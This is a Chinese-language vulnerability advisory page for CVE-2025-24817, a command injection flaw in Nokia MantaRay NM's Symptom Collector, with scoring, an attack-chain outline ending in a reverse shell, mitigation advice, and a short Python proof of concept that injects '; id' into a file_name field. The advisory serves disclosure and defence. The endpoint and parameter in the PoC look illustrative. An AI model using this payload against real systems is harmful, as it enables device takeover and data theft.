CVE-2025-24817 CVSS 8.0 高危

CVE-2025-24817 Nokia MantaRay NM OS命令注入漏洞

披露日期: 2026-04-07

来源: b48c3b8f-639e-4c16-8725-497bc411dad0

漏洞信息

漏洞编号

CVE-2025-24817

漏洞类型

OS命令注入

CVSS评分

8.0 高危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nokia MantaRay NM

漏洞概述

Nokia MantaRay NM 网络管理系统中的 Symptom Collector 应用程序存在严重的 OS 命令注入漏洞。该漏洞源于应用程序未能对用户输入的特殊元素进行正确中和，使得攻击者能够通过构造特制的恶意请求，在底层操作系统上执行任意命令。此漏洞可能导致设备被完全接管，对网络安全构成重大威胁。

技术细节

该漏洞位于 Nokia MantaRay NM 网络管理系统的 Symptom Collector 组件中，其根本原因是应用程序在构建系统命令时未对用户提供的参数进行严格的过滤和转义。根据 CVSS v3.1 评分向量，攻击者需要处于邻接网络环境（AV:A）并具备低权限账户（PR:L）。利用过程中，攻击者无需诱导用户交互（UI:N），只需向受影响的 API 接口发送精心构造的恶意数据包。由于系统未能正确中和如 `;`、`|`、`&` 等命令分隔符，后端程序会将攻击者注入的参数拼接至系统命令中并执行。鉴于该漏洞对机密性、完整性和可用性均造成高影响（C:H/I:H/A:H），成功利用后，攻击者可直接获取服务器 Shell 权限，读取敏感数据、篡改系统配置或破坏服务进程，严重威胁网络基础设施的安全稳定运行。

攻击链分析

STEP 1

侦察

攻击者扫描内网，识别 Nokia MantaRay NM 设备及其开放的 Symptom Collector 服务端口。

STEP 2

获取访问权

攻击者获取该网络设备的低权限账户凭证（PR:L），满足利用条件。

STEP 3

漏洞利用

攻击者向 Symptom Collector 接口发送包含恶意 Shell 命令的特制数据包，利用命令注入漏洞绕过过滤。

STEP 4

命令执行

服务器端未正确处理输入，将恶意命令传递给操作系统解释器并执行。

STEP 5

建立控制

攻击者利用执行的高权限命令（如反弹Shell），完全控制受影响设备，窃取数据或破坏服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable Symptom Collector application
target_url = "http://<target_ip>:<port>/api/symptom"

# Attacker's controlled input with command injection payload
# Example payload: ; id to execute the 'id' command
payload_data = {
    "file_name": "/var/log/syslog; id"
}

try:
    # Send POST request to trigger the vulnerability
    response = requests.post(target_url, data=payload_data, timeout=10)

    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check if the OS command was executed on the target.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Nokia MantaRay NM (具体受影响版本请参考Nokia官方安全公告)

防御指南

临时缓解措施

在补丁未部署前，建议将受影响的设备管理接口隔离在独立的VLAN中，仅允许受信任的管理主机访问。同时，应加强用户身份认证机制，并启用日志审计功能以检测潜在的利用尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表